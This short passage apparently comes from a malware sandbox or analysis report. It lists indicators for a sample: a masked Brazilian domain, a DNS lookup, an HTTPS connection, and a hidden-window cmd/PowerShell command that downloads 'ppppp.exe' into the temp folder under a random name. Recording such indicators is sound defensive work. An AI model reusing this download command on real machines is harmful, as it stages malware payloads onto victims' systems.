Technical Information
- https://www.co#####ercultura.com.br/adm/cliente/editor/ppppp.exe as %temp%\6y56t65y56t6y565tj564yuk45uikui54kerferrhth56h65t56t56yj565j4u5k4u845d45612sc512e5r4y8t574i85u4dfsc151rfvb51n1yh85.exe
- 'co#####ercultura.com.br':443
- DNS ASK co#####ercultura.com.br
- '%WINDIR%\syswow64\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('https://www.co#####ercultura.com.br/adm/cliente/editor/ppppp.exe','%temp%\6y56t65y56t6y565tj564yuk45uikui54kerferrhth56h65t56t56yj5...' (with hidden window)